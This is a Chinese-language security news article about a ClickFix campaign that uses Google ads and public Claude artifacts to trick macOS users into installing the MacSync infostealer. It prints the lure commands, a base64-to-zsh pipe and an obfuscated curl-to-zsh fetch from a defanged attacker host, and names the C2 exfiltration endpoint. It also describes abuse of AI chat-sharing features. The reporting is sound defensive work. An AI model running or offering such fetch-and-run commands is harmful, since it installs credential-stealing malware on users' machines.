打开网易新闻 查看精彩图片

黑客正借助Claude共享内容与谷歌广告发起ClickFix攻击,向搜索特定关键词的macOS用户分发信息窃取类恶意软件。研究人员已在野外发现至少两种攻击变体,超过1万名用户访问过包含危险指令的恶意内容。

Claude 共享内容(Claude artifact)是指由用户通过Anthropic大语言模型生成并公开的内容,形式包括指令、教程、代码片段等。这类内容独立于主对话界面,任何人都可通过claude.ai域名下的链接直接访问。

该类页面会提示用户:所展示内容由用户生成,未经准确性验证。

研究人员发现,在谷歌搜索中,“在线DNS解析器”“macOS命令行磁盘空间分析工具”“HomeBrew”等关键词均出现了恶意推广结果。

打开网易新闻 查看精彩图片

恶意 HomeBrew 搜索结果

这些搜索结果会跳转到公开的Claude共享内容,或冒充苹果官方支持的Medium文章。两种页面都会诱导用户在终端中粘贴并执行Shell命令。

第一种攻击变体诱导执行的命令为:

echo "..." | base64 -D | zsh

第二种为:

true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh

打开网易新闻 查看精彩图片

第二种攻击变体使用伪造苹果支持页面

研究人员发现,该恶意Claude教程页面浏览量已至少达到15600次,这一数据可大致反映受骗用户规模。根据几天前观测到的该页面显示,浏览量为12300次。

打开网易新闻 查看精彩图片

Claude 对话中托管的 ClickFix 攻击引导页面

在终端执行上述命令后,系统会下载一个MacSync信息窃取木马的加载器,用于窃取设备上的敏感数据。

研究人员表示,该木马使用硬编码令牌与API密钥连接命令与控制(C2)基础设施,并伪造macOS浏览器UA以伪装成正常流量。

命令执行结果会直接传递给osascript,由AppleScript负责执行实际的窃取行为,包括钥匙串、浏览器数据、加密货币钱包等信息。”

窃取的数据会打包为/tmp/osalogging.zip,通过HTTP POST请求上传至攻击者C2服务器a2abotnet[.]com/gate。若传输失败,压缩包会被拆分为多个小块并重试8次。上传成功后,程序会执行清理操作,抹除所有痕迹。

两种攻击变体均从同一C2地址下载第二阶段载荷,表明背后是同一威胁组织所为。 此前已有类似攻击活动利用ChatGPT、Grok的对话分享功能分发AMOS信息窃取木马。2025年12月,研究人员就发现攻击者利用ChatGPT与Grok对话分享链接,针对macOS用户发动ClickFix攻击。

此次攻击开始滥用Claude,表明大模型滥用已扩散至更多主流平台。安全研究人员提醒用户保持谨慎,不要在终端执行来源不明或无法完全理解的命令。而在同一对话中向聊天机器人询问命令是否安全,是简单有效的判断方法。

参考及来源:https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/